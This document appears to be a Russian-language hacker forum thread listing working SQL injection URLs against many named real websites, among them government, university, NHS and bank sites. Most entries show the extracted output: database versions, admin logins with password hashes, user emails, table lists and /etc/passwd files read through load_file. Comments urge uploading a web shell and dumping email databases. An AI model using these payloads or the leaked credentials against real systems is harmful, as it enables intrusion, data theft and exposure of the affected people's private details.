_ttp://www.greyhorse.ru/in/articles/article.php?id=-137+union+select+1,2,3,4,concat_ws(0x3a,uid,uname, pass,email,user_icq),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20+from+iw_users+limit+1+offset+3--

4:Leonid:ba954023e9ee590ab082b65b81b6b93d:sizov.le onid@list.ru

WAP дижок странного топа

http://tipik.ru/
version() - 5.0.51a-community-log
user() - gener123_top@localhost
database() - gener123_top
************
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,id,login,pass)+fro m+superadmin--

************
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+40,1--
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+60,1--
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+60,1--
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+90,1--
и т.д.
************

_ttp://beauty4us.net/shop_display_products.php?cat_id=-1%20union%20select%20concat(email,0x3a,password),1 ,2,3,4,5,6,7%20from%20naxtor_cart_store_customer/*

wauler86@aol.com:e807f1fcf82d132f9bb018ca6738a19f

http://www.oaktreeracing.com/season/events/event.php?id=-6+union+select+1,2,version(),4,5,6,7,8/*

Database Version: 4.1.22-log
Database name: oaktree
User name: oaktree@intrepid.select.net

---------------------------------------------------------------------------------------

http://www.weyerbacher.com/cwo.php?id=7&page_id=-14+union+select+1,version(),3,4/*

Database Version: 4.1.22-standard
Database name: weyerbach_cwo
User name: weyerbach_cwo@localhost

---------------------------------------------------------------------------------------------

http://www.oakcd.org.uk/page.php?id=-5+union+select+1,2,password,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,19+from+admin--

Database Version: 5.0.67-community
Database name: sccouk13_oak
User name: sccouk13_admin@localhost

--------------------------------------------------------------------------------------------------

http://www.oakmall.co.uk/shops.php?id=-46'+union+select+1,name,3,4,5,6,7,8,9,0,1,12+from+ users/*

Database Version: 4.1.21
Database name: customers
User name: peter@localhost

----------------------------------------------------------------------------------------------------

http://www.arkells.com/pubs_more2.php?id=-648'+union+select+1,2,3,concat_ws(0x3a,user,passwo rd),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,39+from+users/*

Database Version: 4.1.22
Database name: Arkells
User name: sw002db@localhost

---------------------------------------------------------------------------------------------------------
http://www.quickrepo.com/moreinfo.php?id=-14'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,34/*
Database Version: 4.1.22-log
Database name: quickrepo
User name: quickrepo@localhost

http://www.igpa.at/heim.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13site89m2@local host:usr_site89_2:5.0.51-log

http://www.ihs97.com/view_alumni.php?id=-125+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, version(),database(),user()),1,2,3,4,5,16/*

4.1.22-max-log : ihs97 : ihs97@208.109.138.57

_ttp://elkotob.com/news.php?id=-1+union+select+file_priv,concat_ws(0x3a,user,passw ord),version()+from+mysql.user--
Yroot:*DB469070DB0AD0CA0B93040D166D7FC4713D6961
5.0.45

_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3+from+mysql.user--
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin clamav:x:100:103:Clam Anti Virus Checker:/var/clamav:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin avahi-autoipd:x:101:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin dodo-online:x:500:500::/mnt/sdb1/dodo-online:/bin/bash

_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3+from+mysql.user--

_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3+from+mysql.user+into+outfile+'/tmp/1.txt'--

_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/tmp/1.txt'),3+from+mysql.user--

Ну и в таком же духе, впринципе ничё не мешает залить шелл...

http://www.bearingru.sibinfo.org/right.php?id1=-163+union+select+concat_ws(0x3a,version(),database (),user(),@@version_compile_os),2

Database Version: 5.0.83-log
Database name: sibinfo
User name: sibinfo1_org@localhost
Os: redhat-linux-gnu

http://iri.iiu.edu.pk/index.php?page_id=9+union+select+1,2,3,4,5,concat( 0x2,version(),user(),database()),7,8,9,10,11

5.0.45-community-ntrir2009rir@localhostiriportal

bzvv.ch - омг!!! бзззззззззз:)
http://www.bzvv.ch/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/sElECT/**/version(),2,null/**/FROM/**/adressen/**/LIMIT/**/0,1
Table adressen
userid
passwort
name
vorname
adresse
standort
ptelefon
gtelefon
natel
plz
ort
gebdatum
eintritt
austritt
mitglied
vorstand
vorstand2
email
cnt
gesperrt
webadmin
status
половина полей не работает:(
version - 5.0.51a
user - bizuvevi@localhost
database - wwwbzvvch

alwhyyn.net PR=3
http://www.alwhyyn.net/news/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/sElECt/**/1,2,version()/**/FROM/**/users/**/LIMIT/**/0,1
Version = 5.0.81-community
User = alwhyyn_news@localhost
Database = alwhyyn_news

http://www.alwhyyn.net/news/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/sElECt/**/1,2,coNCAt(0x3a,username,0x3a,password,0x3a)/**/FROM/**/admin/**/LIMIT/**/0,1


http://www.alwhyyn.net/news/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/sElECt/**/1,2,coNCAt(0x3a,username,0x3a,password,0x3a)/**/FROM/**/users/**/LIMIT/**/0,1

Онлайн казино
http://www.hyperspin.de/Links/links.php?id=16'

http://www.bingobuds.com/links.php?id=2+and+1=0+ Union Select UNHEX(HEX([visible]))

Columns: 1

Database:zzz

information_schema
101bestonlinecasinos
10bestbingosites
5starsbingo
adsdb
affdb
all_db
allegiance_test5
atte
atte_old
banners
bestonlinecasinos
bingo_st
bingocity
bingosites
blackjack2002
blackjack777
books
books_sites
bumpstone_client
casinocityclub
casinodomain
cms_109k
common
craps
craps777
db_109k
db_3dbingo_com
db_777bingo_com
db_acapulcobingo_com
db_all_about_camping
db_all_about_gadgets_and_electronics
db_all_about_improving_your_home
db_all_about_wine_and_gourmet
db_allgadgetsreviewed
db_american_gambling_com
db_atlantisbingo_com
db_baccarat365_com
db_baccarat777_com
db_baccarat_365_com
db_baccarat_777_com
db_baccarat_internet_com
db_baccarat_land_com
db_baccarat_magic_com
db_baccarat_nation_com
db_baccarat_planet_com
db_bingo007_com
db_bingo4play_com
db_bingo_city_com
db_bingobellissimo_com
db_bingobuds_com
db_bingocardsonline_com
db_bingochatclub_com
db_bingodimes_com
db_bingoentry_com
db_bingoexit_com
db_bingolaguna_com
db_bingolucky_com
db_bingoluna_com
db_bingomama_com
db_bingomonaco_com
db_bingomundo_com
db_bingonickels_com
db_bingononstop_com
db_bingony_com
db_bingood_com
db_bingoriviera_com
db_bingoromance_com
db_bingoshmingo_com
db_bingospain_com
db_bingosprings_com
db_bingostardust_com
db_bingotahiti_com
db_bingotample_com
db_bj_21_com
db_blackjack365_com
db_blackjack777_com
db_blackjack_365_com
db_blackjack_777_com
db_blackjack_internet_com
db_blackjack_land_com
db_blackjack_nation_com
db_blackjack_planet_com
db_boscasinos_com
db_camelotbingo_com
db_cashbonusbingo_com
db_cashprizebingo_com
db_casino_free_download_com
db_casino_spain_2002_com
db_casinoaceclub_com
db_casinocityclub_com
db_casinoclub2000_com
db_casinogame2000_com
db_casinolux365_com
db_casinos_777_com
db_casinos_land_com
db_casinos_magic_com
db_casinos_nation_com
db_casinos_tournaments_com
db_casinostournaments_com
db_casinovegas365_com
db_challengebingo_com
db_chatbingo_com
db_cityclubbingo_com
db_common_articles
db_craps365_com
db_craps_365_com
db_craps_777_com
db_craps_land_com
db_craps_nation_com
db_craps_planet_com
db_craps_tournaments_com
db_dbsfinman
db_diamondclubbingo_com
db_diamondclubcasinos_net
db_dice_casino_com
db_foxwoodsbingo_com
db_gambling_365_com
db_gambling_777_com
db_gambling_domain_com
db_gambling_land_com
db_gambling_magic_com
db_gambling_nation_com
db_gambling_school_com
db_gambling_tc
db_glorybingo_com
db_go_baccarat_com
db_go_blackjack_com
db_go_craps_com
db_go_keno_com
db_go_poker_room_com
db_go_roulette_com
db_go_slots_com
db_go_texas_holdem_com
db_goldbingoclub_com
db_goscratchtickets_com
db_gratisbingogames_com
db_guia_de_baccarat_com
db_hugeprizebingo_com
db_internet_poker_free_com
db_internet_poker_sites_com
db_intrecomei
db_jackpot_365_com
db_jackpot_777_com
db_jackpot_planet_com
db_keno777_com
db_keno_365_com
db_keno_777_com
db_keno_internet_com
db_keno_land_com
db_keno_nation_com
db_keno_planet_com
db_keys_bingo
db_keys_gambling
db_keys_roulette
db_mamabingo_com
db_mega_baccarat_com
db_mega_casinos_com
db_mega_jackpot_com
db_mega_online_casinos_com
db_mega_poker_room_com
db_mega_roulette_com
db_mega_texas_holdem_com
db_moonlightbingo_com
db_mybingobucks_com
db_mybingosite_com
db_no1bingo_com
db_novobingo_com
db_number1_3d_casino_com
db_number1_3d_gambling_com
db_number1_american_casino_com
db_number1_freeware_com
db_online_casino_download_com
db_online_casinos365_com
db_online_casinos_download_com
db_online_casinos_information_com
db_online_casinos_land_com
db_online_casinos_tournaments_com
db_online_poker_download_free_com
db_online_poker_games_online_com
db_online_poker_sites_reviews_com
db_online_poker_sites_uk_com
db_onlinebingo_cc
db_onlinebingosite_com
db_onlinecasino2002_com
db_onlinecasinos_center_com
db_onlinecasinos_st
db_onlinegambling2002_com
db_onlinegambling_st
db_onlinepoker_room_com
db_onlinetexas_holdem_com
db_partnerbingo_com
db_play_texas_holdem_game_online_com
db_playlivebaccarat_com
db_playliveblackjack_com
db_playlivecasino_com
db_playliveroulette_com
db_poker_365_com
db_poker_777_com
db_poker_bonus_money_com
db_poker_bonus_online_com
db_poker_games_on_line_com
db_poker_games_online_for_free_com
db_poker_games_online_free_com
db_poker_games_to_play_com
db_poker_magic_com
db_poker_nation_com
db_poker_room365_com
db_poker_room_download_com
db_poker_room_games_com
db_poker_room_internet_com
db_poker_room_land_com
db_poker_room_magic_com
db_poker_room_nation_com
db_poker_room_school_com
db_poker_room_site_com
db_poker_room_strategy_com
db_poker_room_tournaments_com
db_poker_roomdownload_com
db_poker_rules_betting_com
db_popularbingo_com
db_prestigecasino_net
db_queenbingo_com
db_queensclubbingo_com
db_reviewedbingosites_com
db_roulette365_com
db_roulette777_com
db_roulette_365_com
db_roulette_777_com
db_roulette_land_com
db_roulette_nation_com
db_roulette_planet_com
db_scoutbb_com
db_slots365_com
db_slots_365_com
db_slots_777_com
db_slots_internet_com
db_slots_land_com
db_slots_nation_com
db_slots_planet_com
db_spider
db_starluckbingo_com
db_strictlybingo_com
db_strippoker2000_com
db_texas_holdem365_com
db_texas_holdem_download_free_game_com
db_texas_holdem_for_free_online_com
db_texas_holdem_game_online_com
db_texas_holdem_games_com
db_texas_holdem_internet_com
db_texas_holdem_land_com
db_texas_holdem_magic_com
db_texas_holdem_nation_com
db_texas_holdem_school_com
db_texasholdemonlinepoker_com
db_top10bingosites_com
db_tropicanabingo_com
db_vegasusa365_com
db_videopoker_st
db_virtualbingogames_com
declined
directory
directory_links_full
dotbingo
dotbingodb
dotcasino
errors_find
exp1
exp2
exp3
exp4
g_site
gambling_smart
goscratchtickets
guia_de_baccarat_com
igmd
igmd_links
igmdltd
igmdselling
internet_poker_free_com
internet_poker_sites_com
intrecomei
jackpot777
mysql
n1fw
no1freeware
online_poker_download_free_com
online_poker_games_online_com
online_poker_sites_reviews_com
online_poker_sites_uk_com
onlinebingo_cn
onlinebingo_tv
onlinegambling_st
operations
pdns
pear
pharmacyacy24x7_com
phplive
phpmyadmin
play_texas_holdem_game_online_com
playliveroulette
poker777
poker_bonus_money_com
poker_bonus_online_com
poker_games_on_line_com
poker_games_online_for_free_com
poker_games_online_free_com
poker_games_to_play_com
poker_rules_betting_com
popup
report
reviewedbingosites_com
roulette2002
roulette777
rss
scoutbb
sites
slots2000
slots_777
slots_st
strippoker2000
test
texas_holdem_game_online_com
texasholdem_st
top10bingosites
vault
vaultp
wawawiwa
winners777
wlog
zzz

http://www.eccb08.org/index.php?pageId=2+UNION+SELECT+AES_DECRYPT(AES_EN CRYPT(CONCAT_WS(0x3,version(),user(),database()),0 x71),0x71)


5.0.51a-24+lenny1-log eccb08@localhost eccb08


вывод в сорсах

Агросис. Проект по адаптации системы ведения глобальных справочников продукции агропромышленного комплекса.
http://www.agrosys.ru/firmreg/refprod.asp?start=3&firmID=2010091+OR+1=(select+@@version)&pageHeader=2
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: )
system_user = sa

ООО «Фирма-Реал»
http://www.real-kuhni.ru/index.php?page=products&pid=0&tid=1000000+union+select+1,2,concat_ws(0x3a,databa se(),version(),user())/*
realkuhniru:5.0.41-log:realkuhniru@jerry.mplik.ru

PR5
http://www.ecb.ee/page.php?nid=-21+UNION SELECT 1,2,3,4,5,6,7,CONCAT_WS(CHAR(32,58,32),user(),data base(),version()),9,10,11,12,13,14,15,16,17,18,19, 20,21,22
d8176sa29147@localhost : d8176sd21543 : 5.0.67-log

http://www.objectif-emploi.3cfr.com/index.php?ThemeID=3&InfoID=4&OE_RubriqueID=-3+union+select+1,2,3,4,5,6,7,8+from+mysql.user+/*+

http://reseau.risc.cnrs.fr/liens/affi_lien.php?ID=-44+union+select+1,database(),3,4,5,6,7,8,9+/*+
cogiter

http://www.risc.cnrs.fr/detail_lesechos.php?ID=-11282+union+select+1,2,3,4+/*+

_ttp://asiakomoditi.com/article_details.php?id=-5081%20union%20select%201,2,3,4,5,6,concat_ws(0x3a ,id,user,password,policy,nama),8,9%20from%20t_admi n

Пассы в открытом виде...

stamijugend.ch
http://www.stamijugend.ch/links/links.php?id=1/**/anD/**/1=8/**/uniON/**/seLecT/**/1,version()/**/FROM/**/users/**/LIMIT/**/0,1
version - 5.1.30-log
user - stadtm44_02@server48.hostpoint.ch
database - stadtm44_stamijugend
table - users (username, userpass)

http://www.stamijugend.ch/links/links.php?id=1/**/anD/**/1=8/**/uniON/**/seLecT/**/1,conCAt(0x3a3a3a,username,0x3a3a3a,userpass)/**/FROM/**/users/**/LIMIT/**/0,1


zivilschutz-ooe.at
http://www.zivilschutz-ooe.at/src/links.php?ID=1+anD+1=-1+uniON+seLEcT+1,user(),3,4,5,6,7+from+users/*
Version = 5.0.27-standard
User = b138565227@localhost
Database = zivilschutz-ooe_at_dbfrast
table - users (User, Password)

http://www.zivilschutz-ooe.at/src/links.php?ID=1+anD+1=-1+uniON+seLEcT+1,conCAt(0x3a,User,0x3a,Password),3 ,4,5,6,7+from+users/*


sileessenota.com
http://www.sileessenota.com/links.php?id=1/**/aNd/**/substring(version(),1,1)=4&t=s&idi=4&pagina=2
ветка 4

http://www.burschenschaft-feistritz-gail.at/links.php?id=1+anD+substring(version(),1,1)=3/*

PostgreSQL

http://obras.itajai.sc.gov.br/noticiasp_det.php?id_noticia=99999+and+1=cast((SEL ECT+inet_server_port()||chr(58)||current_user||chr (58)||version())+as+int)

port:5432
user: portal
version:PostgreSQL 8.3.1 on i386-portbld-freebsd7.0, compiled by GCC cc (GCC) 4.2.1 20070719 [FreeBSD]

sexshopinsensatez.com.br - сексшоп!!!!(только вы маме моей не говорите)
http://www.sexshopinsensatez.com.br/links.php?id=1+anD+1=8+uniON+seLECT+1,version(),3, 4/*
version - 5.0.45-community
user - atualloj_5@localhost
database - atualloj_7

pr5 all
http://www.museudosesportes.com.br/noticia.php?id=-12583+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7
mesportes@localhost : mesportes : 5.0.51a-24+lenny1-log
---------
http://www.sdu.nhs.uk/page.php?area_id=-7+UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version ())--
nhssdu_db : 5.0.58
---------
http://www.cics.go.ug/database/private_detail.php?id=-50+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
meaug05_cics@72.41.82.2 : meaug05_cics : 4.1.20-max-log

http://www.vash-divan.ru/help.php?id=4/**/UNION/**/SELECT/**/1,2,3,4,5/**/FROM/**/users/**/LIMIT/**/1,1/*

Database Version: 4.0.26
Database name: wwwvashdivanru
User name: vashdiva@yox.hc.ru

ap
PR5 All
http://www.pnm.org.tt/docs_policies.php?id=-1+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7
pnmtt@localhost : pnmtt : 5.0.45-log
------------
http://www.anis.sm/Da_leggere/voci_eventuali.php?id=-18+UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),ver sion()),4,5,6
admin.guidat.com@localhost : guidatcom : 5.1.34-log
http://www.anis.sm/amministrazione/

_ttp://infores.mpt.gov.by/ir/database/view_author.php?id=1+union+select+1,concat_ws(char (58),version(),user(),database(),@@version_compile _os),3,4,5,111,7,8,9,10,11,12,13/*
4.1.22-log:inforesipps@localhost:inforesipps:portbld-freebsd6.1

http://www.olena.fr/index.php?RubID=-3+union+select+1,2,concat_ws(0x3a3a,UserLogin,User Password),4,5,6,7,8,9,10,11+from+user+--+

http://www.objectif-emploi.3cfr.com/index.php?ThemeID=3&InfoID=4&OE_RubriqueID=-3+union+select+1,2,database(),4,5,6,7,8+--+
dragon_072

http://www.auqa.edu.au/auqf/2009/program/day.php?id=3-3+union+select+1,2,3,4,version(),6,7%20--

5.1.34

file-magz.com - PR=2
http://file-magz.com/file/core/main/links.php?id=1+anD+1=7+uniON+seLEcT+1,version(),us er(),database(),5
Version = 5.0.81-community
User = filemcom_magz@localhost
Database = filemcom_file
Table - user (username, password)


http://file-magz.com/file/core/main/links.php?id=1+anD+1=7+uniON+seLEcT+null,username, null,password,null+from+user

_ttp://www.archive.perm.ru/showfond.php?id=-59+union+select+1,2,3,4,5,6,concat_ws(char(58),use r_id,username,user_password,user_email),concat_ws( '|||',@@basedir,@@version_compile_os,@@tmpdir,@@da tadir),9+from+phpbb_users+limit+1+offset+1--

2:Antoxa:$H$7L1rcA7zwhqrSFK6ngszTHhCRv4M5M1:diamx@ inbox.ru

/usr/|||redhat-linux-gnu|||/tmp/|||/var/lib/mysql/

[PR=8]
http://www.fh-oow.de/studium/studiengaenge/index.php?id=-20+union+select+1,2,3,4,5,6,concat_ws(0x3b,databas e(),version(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40+--+&einzel=1&lang=de

zsb;4.1.22-log;zsb@whv-www-02.fh-oow.de

[PR=2]
http://www.ergenekonteror.com/karikatur.php?id=-21+union+select+1,2,3,concat_ws(0x3b,database(),ve rsion(),user()),5--

siteetox;5.0.45;ergenekonteror@91.151.81.108

;)

http://www.fixwap.net/ru/html/outtop.php?uid=-238+union+select+concat_ws(0x3a,version(),database (),user())--
Можно оттуда немнога трафика слить)))
Ковычки не фильтруются, права на запись не смог посматреть.
Комну удастся залить шелл, напишите в ПМ.

http://www.psggw.cn/recruit_show.php?Sid=126&id=186+union+select+1,2,3,4,concat_ws(0x3,version( ),database(),user()),6,7,8,9,10,11,12,13+limit+1,1/*


5.0.22 psggw psggw_f@210.51.44.158

Сберегательный Банк Российской Федерации
Центрально-Чернозёмый Банк
http://www.ccb.sbrf.ru/vbank/news.asp?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from+news+

http://gothic.zp.ua/news/index.php?id_parent=1+and+substring(@@version,1,1) =5

_ttp://www.truro-ma.gov/php/event_details_t.php?event_id=-1513+union+select+1,concat_ws%280x3a,login,pw%29,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24+from+users+limit+1,1--
cpatapie:de2e05e1e4ff48c85d1f9248d001d52b

_ttp://www.truro-ma.gov/php/event_details_t.php?event_id=-1513+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24+from+users--
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:100:102::/var/spool/exim4:/bin/false statd:x:101:65534::/var/lib/nfs:/bin/false identd:x:102:65534::/var/run/identd:/bin/false djfgnjnldgklg:x:1000:1000:djfgnjnldgklg,,,:/home/djfgnjnldgklg:/bin/bash sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:1001:1001::/home/mysql:/bin/sh ntp:x:104:104::/home/ntp:/bin/false snmp:x:105:65534::/var/lib/snmp:/bin/false

http://www.comicbookdb.com/character.php?ID=-1900+union+select+1,2,3,4,version(),6,7,8,9,0,11--

Database Version: 5.1.34-community
Database name: dbcomic_comicbookdb
User name: dbcomic_admin@10.10.6.82

http://www.shop77.ru/client/image.php?src=http://www.shop77.ru/pics1/39598_0.jpg&id=-517344+union+select+1,version(),3,4+from+mysql.use r+--+

http://www.autokedy.ru/podbor.php?af=9385&m=9397+union+select+1,2,table_name,null,null,null, null,null+from+information_schema.tables+--+

http://www.jf-lavra.pt/links.php?id=1/**/anD/**/1=-1/**/uniON/**/seLEcT/**/unhex(hex(1)),unhex(hex(1)),unhex(hex(version())), unhex(hex(1)),unhex(hex(1)),unhex(hex(1)),unhex(he x(1)),unhex(hex(1))/*
version = 4.1.23-pro-gpl-log


http://www.beursstart.nl/links.php?id=1+anD+1=7%20+uniON+seLEcT+1,version() ,3/*
version = 5.0.45-log

[PR=4]

Фан сайт К. Роналдо
http://www.cronaldo7.es/news_detail.php?id=-10+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5--

ronaldoes:4.1.20:ronaldoes@localhost

http://tb.ningbo.gov.cn/homepage/view.php?id=45678&catid=2+union+select+1,2,concat(0x3,version(),user (),database())+limit+1,1

4.1.21-standardnbtb@localhostnbtb


http://www.armagh.gov.uk/other_details1.php?externalbodies_id=7+union+selec t+1,2,concat_ws(0x2a,version(),user(),database()), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25+limit+1,1/*

4.0.18armaghcorp@localhostarmaghcorp 5

http://www.rating.am/drraw.php?rateBy=-days&id=-2057+UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version ())--
там база мыл кому надо сливайте :)
rating@cpanel.host.am : rating : 5.0.51a-log

http://www.derzay.com/news.php?news_id=-328+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9+--+

5.0.45:derzay:derzay@localhost

_ttp://www.wm.bryansk.ru/modules.php?name=News&file=article&sid=53+union+select+1,2,3,4,concat_ws(0x2f2f2f,nam e,password),@@version_compile_os,7,8,9,10,11,12,13 ,14+from+users+limit+1,1--

Aleksej///12345678

portbld-freebsd7.1

tvsur.co.cr --- PR=3
http://tvsur.co.cr/esp/links.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLEcT/**/version()/**/FROM/**/links
Version = 4.1.22-standard-log
User = tvsurco_tvsurco@localhost
Database = tvsurco_tvsur

http://tvsur.co.cr/esp/links.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLEcT/**/email/**/FROM/**/links


506radio.com ---PR=3
http://506radio.com/esp/links.php?id=1/**/aNd/**/substring(version(),1,1)=4
ветка - 4

http://hundon.net/php/display_model.php?id=-78+union+select+1,load_file(0x2f6574632f7061737377 64),3,4,5,6,7,8,9,0,11,12,13+from+mysql.user/*

Database Version: 5.0.32-Debian_7etch10-log
Database name: peterrake
User name: www@localhost

http://www.gamingtrend.com/PressReleases/index.php?PRID=-9224+union+select+1,concat_ws(0x3a3a,username,pass word,status,email,userID),3,4,5,6,7+from+Users+whe re+status=0x61646D696E+limit+5,1+--+

http://www.spec.bc.ca/news/news.php?newsID=-213+union+select+1,2,3,4,5,6,table_name+from+infor mation_schema.tables+--+

http://www.svcd.ru/docs/news/news.php?newsID=-394'+union+select+1,2+--+&PHPSESSID=97d4ed6ff029c9332fbba5c20ee6ff10

aveseica.com --- PR=1
http://www.aveseica.com/links.php?id=1+anD+1=9+union+select+1,version()
version = 5.0.27
user = avesseica@localhost
database - avesseica
table - login (id, login, pass, acesso)

http://www.aveseica.com/links.php?id=1+anD+1=9+union+select+1,conCAt(0x3a, id,0x3a,login,0x3a,pass,0x3a,acesso)+from+login/*

http://www.waterfallswest.com/waterfall.php?id=-413+union+select+1,2,3,4,version(),6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,44/*

Database Version: 4.1.20-log
Database name: wwest
User name: wwest@whhttp-matrix.pas.sa.earthlink.net

_ttp://www.macforge.net/projects.php?cat=-1+union+select+1,group_concat(table_name+separator +0x0a),3+from+information_schema.tables+where+tabl e_schema+not+in+('information_schema')+--+
MacTech25-2006 MacTech25-2007 MacTech25_2008 access accesslog actions actions_aid authmap batch blocks blocks_roles boxes cache cache_block cache_content cache_filter cache_form cache_menu cache_page cache_update cache_views comments contact content_field_issue content_group content_group_fields content_node_field content_node_field_instan

_ttp://www.macforge.net/projects.php?cat=-1+union+select+1,load_file('/etc/passwd'),3+--+

## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # This file will not be consulted for authentication unless the BSD local node # is enabled via /Applications/Utilities/Directory Utility.app # # See the DirectoryService(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false _postfix:*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false _mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false _pcastagent:*:55:55:Podcast Producer Agent:/var/pcast/agent:/usr/bin/false _pcastserver:*:56:56:Podcast Producer Server:/var/pcast/server:/usr/bin/false _serialnumberd:*:58:58:Serial Number Daemon:/var/empty:/usr/bin/false _devdocs:*:59:59:Developer Documentation:/var/empty:/usr/bin/false _sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false _www:*:70:70:World 